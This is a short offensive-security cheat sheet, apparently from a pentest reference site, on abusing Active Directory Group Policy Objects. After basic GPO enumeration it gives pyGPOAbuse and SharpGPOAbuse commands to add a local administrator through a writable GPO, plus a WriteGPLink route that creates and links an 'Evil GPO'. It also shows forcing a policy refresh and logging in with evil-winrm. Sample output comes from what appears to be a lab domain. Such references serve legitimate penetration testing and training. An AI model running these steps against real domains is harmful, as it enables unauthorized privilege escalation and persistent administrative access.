GPOs | TLDRBins

Usage Tips:

Click on a keyword to enable inline editing.
Click inside a code block to copy (excludes comments).
Use the button to view examples.
Click outside to collapse all examples.

General

1. Install GPMC [Optional]


# Runas Administrator
Install-WindowsFeature GPMC
Sample Output:
PS C:\Windows\system32> Install-WindowsFeature GPMC
Install-WindowsFeature GPMC

Success Restart Needed Exit Code      Feature Result                           
------- -------------- ---------      --------------                           
True    No             Success        {Group Policy Management}

2. List GPOs Name


# List all GPOs
Get-GPO -All | Select-Object DisplayName
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName

DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO


# Check GPO by name
Get-GPO -Name '<GPO_NAME>'
Sample Output:
TO-DO


# Generate XML report
Get-GPOReport -Name '<GPO_NAME>' -ReportType XML
Sample Output:
TO-DO


# Generate pretty HTML report
Get-GPOReport -Name '<GPO_NAME>' -ReportType HTML -Path "C:\ProgramData\GPOReport.html"
Sample Output:
TO-DO

Abuse #1: Add Local Admin

1. Add Local Admin


# GPO ID from dn of Deafult Domina Policy
python3 pygpoabuse.py <DOMAIN>/<USER>:<PASSWORD> -gpo-id '<GPO_ID>'
Sample Output:
$ python3 pygpoabuse.py example.com/GPOADM:TestTest -gpo-id '31B2F340-016D-11D2-945F-00C04FB984F9' 
SUCCESS:root:ScheduledTask TASK_2300c834 created!
[+] ScheduledTask TASK_2300c834 created!

2. Force Reload


gpupdate /force
Sample Output:
PS C:\programdata> gpupdate /force
gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

3. Check


net localgroup administrators
Sample Output:
PS C:\programdata> net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
john
The command completed successfully.

4. Winrm


evil-winrm -i <TARGET_DOMAIN> -u john -p 'H4x00r123..'
Sample Output:
TO-DO

Ref: pyGPOAbuse

1. Add Local Admin


.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount '<USER>' --GPOName '<GPO_NAME>'
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalADmin --UserAccount 'HHogan' --GPOName 'Default Domain Policy'
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

2. Force Reload


gpupdate /force
Sample Output:
*Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.

User Policy update has completed successfully.

*Evil-WinRM* PS C:\Users\HHogan\Documents> net user HHogan
User name                    HHogan
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/6/2023 11:59:34 AM
Password expires             Never
Password changeable          5/7/2023 11:59:34 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/10/2023 5:30:58 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users         *GPO Managers
The command completed successfully.

Ref: SharpGPOAbuse

Abuse #2: WriteGPLink

1. Create a New GPO


New-GPO -Name "Evil GPO"
Sample Output:
TO-DO

2. Link to Target


Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=<TARGET>,DC=<DOMAIN>,DC=<COM>"
Sample Output:
TO-DO

3. Add Local Admin


.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount '<USER>' --GPOName 'Evil GPO'
Sample Output:
TO-DO

4. Force Reload


gpupdate /force
Sample Output:
TO-DO

5. Check


net user '<USER>'
Sample Output:
TO-DO